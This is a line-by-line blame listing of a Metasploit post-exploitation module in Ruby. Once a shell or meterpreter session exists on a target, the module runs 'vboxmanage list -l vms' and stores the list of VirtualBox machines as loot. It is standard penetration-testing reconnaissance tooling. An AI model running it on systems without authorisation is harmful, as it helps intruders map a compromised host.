2012-01-27 17:12:59 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-01-27 17:12:59 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'yaml'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2012-01-27 17:12:59 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
|
|
|
'Name' => 'Multi Gather VirtualBox VM Enumeration',
|
|
|
|
'Description' => %q{
|
2015-06-22 22:54:17 +00:00
|
|
|
This module will attempt to enumerate any VirtualBox VMs on the target machine.
|
|
|
|
Due to the nature of VirtualBox, this module can only enumerate VMs registered
|
|
|
|
for the current user, thereforce, this module needs to be invoked from a user context.
|
|
|
|
},
|
2013-08-30 21:28:54 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['theLightCosine'],
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ bsd linux osx unix win },
|
2013-08-30 21:28:54 +00:00
|
|
|
'SessionTypes' => ['shell', 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2016-10-29 04:59:05 +00:00
|
|
|
case session.platform
|
|
|
|
when 'windows'
|
2015-06-22 22:54:17 +00:00
|
|
|
if session.type == 'meterpreter'
|
|
|
|
begin
|
|
|
|
res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')
|
|
|
|
rescue ::Rex::Post::Meterpreter::RequestError
|
|
|
|
print_error('VirtualBox does not appear to be installed on this machine')
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
if res.empty?
|
|
|
|
print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
else
|
|
|
|
res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')
|
|
|
|
if res.empty?
|
|
|
|
print_error('VirtualBox isn\'t installed or this user has no VMs registered')
|
|
|
|
return nil
|
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'unix', 'linux', 'bsd', 'osx'
|
2015-06-22 22:54:17 +00:00
|
|
|
res = cmd_exec('vboxmanage list -l vms')
|
|
|
|
|
|
|
|
unless res.start_with?('Sun VirtualBox') || res.include?('Name:')
|
|
|
|
print_error('VirtualBox isn\'t installed or this user has no VMs registered')
|
2013-08-30 21:28:54 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
2015-06-22 22:54:17 +00:00
|
|
|
|
|
|
|
vprint_status(res)
|
|
|
|
store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
|
|
|
|
print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2012-01-27 17:12:59 +00:00
|
|
|
|
|
|
|
|
|
|
|
end
|